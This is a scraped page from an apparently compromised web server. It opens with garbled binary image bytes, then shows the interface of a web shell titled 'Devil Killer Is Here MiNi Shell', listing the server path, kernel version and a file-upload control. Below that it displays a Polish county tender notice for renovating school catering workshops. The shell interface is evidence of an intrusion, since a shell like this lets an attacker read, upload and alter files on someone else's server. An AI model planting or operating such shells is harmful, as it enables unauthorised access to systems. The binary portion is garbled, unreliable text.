JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240710/0040587201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dostosowanie pomieszczeń i pracowni gastronomicznych oraz zaplecza gastronomicznego ZSAE w Weryni do wymaganych standardów i przepisów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kolbuszowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581382</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172275880</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">177445734</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kolbuszowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat.kolbuszowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie pomieszczeń i pracowni gastronomicznych oraz zaplecza gastronomicznego ZSAE w Weryni do wymaganych standardów i przepisów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-355f1c57-8533-4466-bd1c-fb9ddc689c41</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00405872</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00043840/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Dostosowanie pomieszczeń i pracowni gastronomicznych oraz zaplecza gastronomicznego ZSAE w Weryni do wymaganych standardów i przepisów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_kolbuszowski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_kolbuszowski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w niniejszym<br/>postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków<br/>komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w<br/>ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>1) Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe (w tym oświadczenie, o którym mowa<br/>w art. 117 ust. 4 Pzp), pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w<br/>postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym., w<br/>ogólnie dostępnych formatach danych (określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r., poz. 1517 ze zm.) z zastrzeżeniem<br/>formatów, o których mowa w art. 66 ust. 1 Pzp, z uwzględnieniem rodzaju przekazywanych danych (§ 2 ust. 1 rozporządzenia)), w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>.Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/powiat_kolbuszowski<br/>3) W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami odbywa się za<br/>pośrednictwem:<br/>a) platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>b) e-mail: przetrgi@kolbuszowski.pl.<br/>.7) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza<br/>wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna, inna<br/>przeglądarka internetowa niż Internet Explorer, włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub<br/>inny obsługujący format plików .pdf,<br/>Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8) Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz<br/>uznaje go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip ; 7Z.<br/>c) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>d) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych w rozumieniu Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 5/46MIE („RODO”)<br/>jest: Starosta Powiatu Kolbuszowskiego, ul. 11-go Listopada 10, 36-100 Kolbuszowa.<br/>2. W sprawach związanych z Państwa danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, wysyłając e-mail<br/>na adres: iod@kolbuszowski.pl<br/>postępowania o udzielenie niniejszego zamówienia publicznego prowadzonym w trybie podstawowym bez możliwości prowadzenia<br/>negocjacji (art. 275 ust. 1 ustawy Pzp) oraz na podstawie art.6 ust 1 lit. f) RODO w celu ustalenia, obrony i dochodzenia roszczeń<br/>wynikających z odrębnych przepisów.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r., dalej „ustawa Pzp&#34;.<br/>5. Mając na uwadze powyższe przysługuje Państwu prawo do:<br/>• uzyskania informacji, czy Zamawiający/Administrator przetwarza Państwa dane osobowe, a jeżeli ma to miejsce, to do uzyskania<br/>dostępu do nich, z takim zastrzeżeniem że Zamawiający/Administrator ma prawo do żądania od osoby, której dane dotyczą<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>• sprostowania danych osobowych w przypadku, gdy są nieprawidłowe, z zastrzeżeniem, że skorzystanie z prawa do sprostowania<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp, jak również integralnością protokołu oraz jego załączników;<br/>• uzupełnienia danych osobowych, w przypadku, gdy są niekompletne, z zastrzeżeniem, że skorzystanie z prawa do uzupełnienia nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp, jak również integralnością protokołu oraz jego załączników;<br/>• żądania ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO tj.<br/>przechowywania danych osobowych w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, z<br/>zastrzeżeniem że prawo nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego; • wniesienia sprzeciwu dotyczącego przetwarzanych danych, z zastrzeżeniem, iż przysługuje ono<br/>wyłącznie w zakresie danych przetwarzanych na podstawie art.6 ust 1 lit. f RODO,<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych<br/>narusza przepisy RODO.<br/>6. Państwa dane osobowe będą przechowywane .<br/>a) w celu związanym z prowadzeniem postępowania - zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>b) w przypadku prowadzenia postępowań na roboty budowlane lub usługi - okres przechowywania dokumentacji postępowania<br/>wynosi 5 lat od dnia zakończenia postępowania o zawarcie umowy koncesji, a w przypadku gdy czas trwania umowy koncesji<br/>przekracza 5 lat - przez okres jego trwania.<br/>c) w celu ustalenia, obrony i dochodzenia roszczeń - do momentu przedawnienia roszczeń.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp; tj. odrzucenie oferty, lub wykluczenie wykonawcy i odrzucenie oferty.<br/>8. W odniesieniu do Państwa danych osobowych decyzje nie będą cg zmiany umowy podejmowane w sposób zautomatyzowany.<br/>cd zmiany umowy<br/>§21.<br/>Zamawiający dopuszcza zmianę zakresu rzeczowego w następujących przypadkach:<br/>1) w zakresie materiałów, parametrów technicznych, technologii wykonania robót budowlanych, robót zamiennych, sposobu i<br/>zakresu wykonania przedmiotu Umowy bez zwiększania wynagrodzenia Wykonawcy w następujących sytuacjach:<br/>a) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań<br/>technicznych lub technologicznych, innych materiałów, parametrów technicznych, innego rodzaju robót niż wskazane w<br/>dokumentacji przetargowej, i/lub technicznej a wynikających ze stwierdzonych nieprecyzyjnych zapisów, nieprawidłowości, błędów,<br/>tej dokumentacji, zmiany stanu prawnego w oparciu, o który je przygotowano lub nakazów organów administracji publicznej, gdyby<br/>zastosowanie przewidzianych rozwiązań groziło niewykonaniem, nienależytym wykonaniem przedmiotu Umowy, lub niezgodnie z<br/>zasadami współczesnej wiedzy technicznej i/lub obowiązujących przepisów prawnych i/lub w celu zapewnienia optymalnych<br/>parametrów technicznych i jakościowych przedmiotu umowy lub ułatwiających późniejsza eksploatację<br/>b) zmiana ta jest korzystna dla Zamawiającego i interesu publicznego - wykonawca bez zwiększania swojego wynagrodzenia<br/>zaoferował materiały, sprzęt o znacznie lepszych parametrach niż te wskazane w SIWZ i ofercie, a które w sposób znaczący<br/>poprawią jakość wykonania przedmiotu umowy, walory użytkowe lub obniżenie kosztów eksploatacji<br/>c) zmiana materiałów budowlanych, urządzeń, sprzętu, technologii wykonania, wykonania robót zamiennych, gdy wykorzystanie<br/>materiałów budowlanych, urządzeń, technologii wykonania, robót wskazanych w dokumentacji projektowej lub ofercie stanie się<br/>niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, późniejszą lepszą eksploatacją przedmiotu umowy lub<br/>wynika to z względów technicznych, technologicznych, konstrukcyjnych lub materiałowych, uzasadnione jest postępem<br/>technologicznym, zwiększeniem bezpieczeństwa robót budowlanych lub obiektu, lepszym funkcjonowaniem<br/>modernizowanego/przebudowywanego/remontowanego obiektu, lub wpływa to na podniesienie standardu, lepszej eksploatacji,<br/>walorów użytkowych i/lub przyczyni się do skrócenia terminu wykonania robót, obniżenia kosztów wykonania Umowy lub<br/>rozwiązania te spowodują obniżenie kosztów na eksploatację i konserwację wykonanego przedmiotu umowy bez pogorszenia<br/>parametrów technicznych materiałów, wyrobów i urządzeń,<br/>Materiały budowlane, urządzenia i sprzęt posiadać powinny co najmniej takie same parametry jakościowe jak i cechy użytkowe jak<br/>te, które wskazano w pierwotnej dokumentacji technicznej lub ofercie.<br/>Roboty zamienne będą opisane w odrębnym protokole i nie będą powodowały zmiany wynagrodzenia Wykonawcy.<br/>Wykonawca, przed przystąpieniem do wykonywania jakichkolwiek robót, których zakres, sposób wykonania i/lub ilość (dotyczy to<br/>również materiałów, urządzeń i sprzętu) różni się od zakresu, sposobu wykonania i/lub ilości robót wskazanych w dokumentacji<br/>projektowej– dalej „roboty zamienne” zobowiązany jest niezwłocznie, nie później niż w terminie 14 dni od zaistnienia wspomnianych<br/>okoliczności, do pisemnego przedstawienia odpowiedniej dokumentacji potwierdzającej zaistniały stan</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.272.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Planowana inwestycja w Zespole Szkół Agrotechniczno-Ekonomicznych w Weryni obejmuje I etap przebudowy i remontu pracowni gastronomicznych (z cukiernictwem), pomieszczeń do teoretycznej i praktycznej nauki zawodu w tym obsługi kelnerskiej oraz pomieszczeń towarzyszących (zaplecza, szatni na odzież gastronomiczną, korytarze, klatki schodowe) oraz łazienek. Zostanie również wykonana łazienka dla osób niepełnosprawnych Aktualnie pomieszczenia te są w bardzo złym stanie a niektóre z nich należy dostosować do planowanej funkcjonalności. <br/>Poza złym stanem technicznym konieczne jest dostosowanie tych pomieszczeń do obowiązujących standardów nauczania w zakresie żywienia oraz przepisów (sanepidowskich, sanitarnych, HACCP, budowlanych ppoż. bhp) i potrzeb osób niepełnosprawnych. Zakres zadania obejmuje: m.in. remont/przebudowę pomieszczeń, oraz instalacje elektryczne, instalacje sanitarne, wentylacje. W planach jest przygotowanie kuchni z kilkoma stanowiskami, by uczniowie mogli pracować jednocześnie Obecnie pracownie gastronomiczne oraz cukiernicza nie spełniają wymogów nowoczesnego przygotowania uczniów do zawodu kucharza, technika żywienia czy cukiernika. Pomieszczenia w tym ich układ, nie pozwala na realizowanie ćwiczeń praktycznych, których wymaga podstawa programowa kształcenia w zawodzie. Brak ciągów roboczych uniemożliwiał przygotowanie potraw w warunkach takich, jak u pracodawcy. Stąd też pilna konieczność modernizacji i adaptacji istniejących pomieszczeń szkoły na pracownie zawodowe i ich zaplecza. <br/>Cała inwestycja wpłynie korzystnie na ekologię i ochronę środowiska. naturalnego np. poprzez zastosowanie nowoczesnych rozwiązań np. system wentylacji, Realizacja inwestycji pomoże stworzyć nowoczesną, bezpieczną infrastrukturę do nauczania w szkole oraz pozwoli dostosować ją do panujących przepisów, norm i standardów w tym dla osób niepełnosprawnych. <br/>Zakres robót obejmuje dwie kondygnacje: piwnicę i parter budynku ZSAE w Weryni. <br/>2)	Podstawowe roboty dotyczące przebudowy m.in.:<br/>a.	zmiana układu funkcjonalnego dla potrzeb pracowni gastronomicznych oraz zaplecza gastronomicznego oraz niezbędnych pomieszczeń uzupełniających,<br/>b.	dostosowanie części obiektu objętego opracowaniem do obowiązujących przepisów rozporządzenia w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie.<br/>c.	rozbiórka podłogi na gruncie w kondygnacji piwnicy wraz z wykonaniem nowych warstwy<br/>d.	wykończeniowej posadzki podłogowej,<br/>e.	przebudowa istniejących schodów prowadzących do kondygnacji piwnicy polegająca na doprowadzeniu do jednakowej wysokości i szerokości stopni schodowych,<br/>f.	rozbiórka, budowa i przebudowa ścian wewnętrznych działowych (w tym ściany p.poż.),<br/>g.	rozbiórka posadzek oraz wykonanie nowych warstw podłóg,<br/>h.	demontaż istniejącej ślusarki wewnętrznej, montaż w nowym miejscu<br/>i.	wykonanie/uzupełnienie/naprawa tynków wewnętrznych<br/>j.	przebudowa wewnętrznej instalacji wod-kan, instalacji gazowej, c.o., cwu, <br/>k.	budowa wentylacji mechanicznej oraz klimatyzacji,<br/>l.	przebudowa wewnętrznej instalacji elektrycznej (w tym wymiana oświetlenia ewakuacyjnego i awaryjnego),<br/>m.	wymiana wszystkich drzwi wewnętrznych i zewnętrznych (w tym drzwi ppoz.), okien ppoz,<br/>n.	kompleksowe malowanie ścian wewnętrznych w części budynku objętej opracowaniem,<br/>o.	zamknięcie przewodów wentylacji grawitacyjnej,<br/>p.	przeprowadzenie kontroli stanu technicznego kratek ściekowych - czyszczenie, sprawdzenie drożności, lub wykonanie nowych,<br/>q.	wyposażenie pomieszczeń w sprzęt kuchenny na podstawie opracowanej technologii,<br/>r.	budowa rampy zewnętrznej,<br/>s.	montaż sufitów podwieszanych,<br/>t.	montaż windy towarowej w istniejącym szybie,<br/>u.	inne niezbędne prace remontowe w pomieszczeniach objętych opracowaniem.<br/><br/>cd zmiany umowy paragraf 21:<br/>d) niedostępności lub czasowej dłuższej niedostępności na rynku materiałów, wyrobów lub urządzeń wskazanych w<br/>dokumentacji projektowej spowodowana zaprzestaniem produkcji, wycofaniem z rynku lub zbyt dużą ilością zamówień u<br/>producenta w wyniku czego nastąpiłoby opóźnienia w realizacji umowy,<br/>e) pojawienia się na rynku materiałów, wyrobów lub urządzeń o lepszych parametrach technicznych, poprawiających<br/>warunki realizacji robót, co umożliwi skrócenie terminu realizacji umowy, lepsze funkcjonowanie przedmiotu umowy lub<br/>eksploatacji obiektu, obniżenie kosztów późniejszej eksploatacji, walory użytkowe itp.<br/>f) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od<br/>przyjętych w dokumentacji przetargowej oraz dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk<br/>archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń<br/>projektowych niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,<br/>h) wystąpienia warunków terenu budowy, linii elektrycznych i innych, kabli, rur, przewodów odbiegających w sposób istotny<br/>od przyjętych w dokumentacji przetargowej, dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,<br/>i) wystąpi konieczność wykonania zamówień, robót dodatkowych nie objętych zamówieniem podstawowym, niezbędnych do<br/>prawidłowego wykonania przedmiotu zamówienia których realizacja spowoduje zmianę w zakresie rzeczowym zamówienia<br/>podstawowego (np. materiały, technologia).<br/>Wprowadzenie powyższych zmian wymaga pisemnej zgody inspektora nadzoru, projektanta i akceptacji Zamawiającego.<br/>2) zakresu robót poprzez rezygnację z części robót, jeżeli będzie to niezbędne dla prawidłowej realizacji, rozpoczęcia<br/>eksploatacji ub zakończenia przedmiotu umowy. Zamawiający zastrzega sobie prawo do niezrealizowania pełnego zakresu<br/>robót, jeżeli nie można było tego przewidzieć 